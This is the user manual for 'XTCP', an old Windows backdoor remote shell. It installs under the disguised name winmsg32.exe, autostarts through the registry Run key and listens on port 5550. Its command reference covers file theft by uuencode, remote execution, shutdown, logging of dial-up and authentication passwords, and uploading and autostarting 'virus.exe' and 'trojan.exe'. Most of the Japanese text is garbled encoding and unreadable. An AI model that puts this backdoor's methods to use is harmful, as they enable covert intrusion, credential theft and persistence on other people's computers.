        Tiny remote shell service program for Windows - XTCP Version 2.01
                     Produced The Shadow Penguin Security
                      http://shadowpenguin.backsection.net
          Developed by UNYUN (shadowpenguin@backsection.net), 1999/10/26 

[͂߂]

{vOWindowsp̊ȈՃVFT[rXvOłBWindows}V
{vOCXg[ƁATCP|[g5550telnetNCAgɂĐڑ
邱ƂɂAȈՃVFT[rX𗘗p邱Ƃł܂B

[CXg[]

install201.exes邾OKłB
Ainstall201.exeƓfBNgxtcp201.exeuƂĂB
ŁAxtcp.exe\windows\system\winmsg32.exeƖOςăCXg[
AWXgo^Ŏ񂩂玩N܂B
蓮ł̃CXg[́AWXg
\\HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
ɃGgݒ肷邱ƂɂWindowsNɎN邱Ƃł܂B


[gp@]

1. xtcp̎d܂ꂽ^[QbgIPAhX𒲂ׂ(|[g5550scanłOK)
2. telnet target-windows 5550xtcpɃOCD

[R}h]

OCƁAshellhL[ush]#Ƃvvgo܂BŎgpł
R}hȉɏqׂ܂BȂAshellhL̓JgfBNgƂ
TO܂(蔲ł)Bpath͑SăhCu݂̐΃pX
ĂB

(1) ls fBNg
    w肳ꂽfBNgɊ܂܂t@C\܂BAʏls
    ႢASt@Cꍇ́AK*.*tĂB
    o̓tH[}bǵA
     t@C TCY t
    ŒłB́A
    a : A[JCu
    d : fBNg
    h : Bt@C
    r : ReadOnlyt@C
    s : VXet@C
    łB
    []
    ls c:\*.*           : c:\Ɋ܂܂St@C\
    ls c:\windows\*.ini : c:\windowsɊ܂܂gq.inĩt@CSĕ\

(2) cat eLXgt@C
    eLXgt@C̓e\
    [] cat c:\Setuplog.old

(3) cp t@C Rs[t@C
    t@CRs[
    [] cp c:\Setuplog.old c:\windows\aaa

(4) rm t@C
    t@C폜

(5) ren ύXt@C ύX̃t@C
    t@CύX

(6) exec st@C
    st@CsB\B
    AWin̓GUI𔺂̂͒ӂȂƂȂłB
    Ȃ^[QbgWinőJႢ܂B

(7) mktext t@C
    eLXgt@C쐬
    []
    [ush]#mktext c:\test.txt
    aaa bbb
    ccc
    ^D          ctrl+DL[ŏI
    [ush]#

(8) popup bZ[W
    ^[QbgWinɃ|bvAbvbZ[Wo
    []
    popup Hello. I've hacked your PC. Sorry.

(9) shutdown
    ^[QbgPCVbg_E܂B

(10) reboot
    ^[QbgPCċN܂B

(11) passwd [-s][-t][-d]
    Win95/98W̗̐ڑEChE\ꂽAєFWindow\
    ɃAJEg𔲂ăOƂĕۑ܂B
    āAWPPPڑgȂA邢͎d݌xPPPĂȂ
    ƂȂ񂩂PPPO͎c܂񂵁AFWindowxoȂ
    AuthOc܂B

    PPP,F؃AJEg̃O
    -s : MOJn
    -t : MOI
    -d : Ot@C폜
     : O\

(12) xtelnet ^[QbgIPAhX |[g
    gtelnetƓBvɓݑłB
    |[ǵAtelnetȂ23Apop3Ȃ110ƂłB

(13) uuencode GR[ht@C GR[h̃t@C
    uuencodeŃoCieLXgɕϊ܂BŁA^[Qbg玝
    oCit@Cė܂B
    []
    uuencode c:\test.zip c:\test.uue
    cat c:\test.uueŁAGR[ht@C\ăeLXgGfB^
    ܂B̌́AaishƂŃoCiɕ܂B
    (aishwww.vector.co.jp/vpack/ƂɗĂ܂̂)

(14) uudecode fR[ht@C (o̓t@C)
    uuencodeŃGR[heLXgt@CoCiɕ܂B
    o̓t@C̈ȗƁAGR[h̃t@Cŕ
    ܂B
    []
    
    [ush]#mktext c:\virus.uue
    begin 644 virus.exe
     ---  炩uuencodevirus.exe𒣂 ---
    end
    ^d
    [ush]#uudecode c:\virus.uue c:\xxx.exe   virus.exe𕜌
    [ush]#exec c:\xxx.exe  virus.exes

(15) regrun [-c][-d][-l] ݒ肷l ݒ肷f[^
    
    WXgHKEY_LOCAL_MACHINE
    SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run   
    Ƀt@Co^܂B܂AWinÑt@CN̓o^łB
    
    []
    <1> WinNtrojan.exes
    regrun -c trojan c:\windows\trojan.exe
    <2>
    WinNɎN鍀ڂꗗ\
    regrun -l
    <3>
    Ntrojan̍폜
    regrun -d trojan

(16) logout
    I

[폜@]

c:\windows\regedit.exeNāA
\\HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
̃L[폜ĂB
install.exegĂqgŁA悭킩ȂqǵA
\windows\system\winmsg32.exe
݂΂Ƀ|CĂB

[RpCv

exeŕsƂqg̓RpCĎgĂB
\[XVC++5.0ŃRpCł܂D
Libwsock32.libĂˁD
